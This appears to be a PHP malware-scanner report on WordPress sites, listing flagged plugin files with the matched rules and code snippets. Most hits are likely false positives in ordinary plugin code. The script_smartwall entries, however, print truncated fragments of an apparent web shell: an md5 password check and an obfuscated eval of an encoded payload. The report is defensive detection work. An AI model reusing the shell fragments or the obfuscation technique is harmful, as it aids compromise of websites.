"ewogICAgImhvbWV1cmwiOiAiaHR0cHM6Ly9zZXguc2hsanVoaXZzYW1hcmEucnUvIiwKICAgICJyZXN1bHRzdHlwZSI6ICJ2ZXJ0aWNhbCIsCiAgICAicmVzdWx0c3Bvc2l0aW9uIjogImhvdmVyIiwKICAgICJyZXN1bHRzU25hcFRvIjogImxlZnQiLAogICAgInJlc3VsdHMiOiB7CiAgICAgICAgIndpZHRoIjogImF1dG8iLAogICAgICAgICJ3aWR0aF90YWJsZXQiOiAiYXV0byIsCiAgICAgICAgIndpZHRoX3Bob25lIjogImF1dG8iCiAgICB9LAogICAgIml0ZW1zY291bnQiOiA0LAogICAgImltYWdld2lkdGgiOiA3MCwKICAgICJpbWFnZWhlaWdodCI6IDcwLAogICAgInJlc3VsdGl0ZW1oZWlnaHQiOiAiYXV0byIsCiAgICAic2hvd2F1dGhvciI6IDAsCiA...
| Sign 7f5d33bf Line: 635 Dangerous Malware Signature (hash: 7f5d33bf) |
jbG9zZ
| Sign a408f408 Line: 635 Dangerous Malware Signature (hash: a408f408) |
c3Rhd
| Sign ae7830db Line: 635 Dangerous Malware Signature (hash: ae7830db) |
Y2xvc2
| Sign d97f004d Line: 635 Dangerous Malware Signature (hash: d97f004d) |
zdGF0
| Sign ee1cb326 Line: 635 Dangerous Malware Signature (hash: ee1cb326) |
9wZW
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-11-25 12:08:19 Modified: 2020-11-25 18:00:38 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2020-11-25 12:08:19 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:47:35 Modified: 2021-05-16 20:47:35 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-11-25 12:08:21 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
|
//var/www/samara/data/www/shljuhivsamara.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-11-25 12:08:22 Modified: 2020-11-25 18:00:38 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/samara/data/www/shljuhivsamara.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-11-25 12:08:05 Modified: 2020-11-25 18:08:25 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/samara/data/www/shljuhivsamara.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-11-25 12:08:05 Modified: 2020-11-25 18:08:25 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/samara/data/www/shljuhivsamara.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-11-25 12:08:05 Modified: 2020-11-25 18:08:25 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:50:49 Modified: 2020-07-24 20:02:34 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:34 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
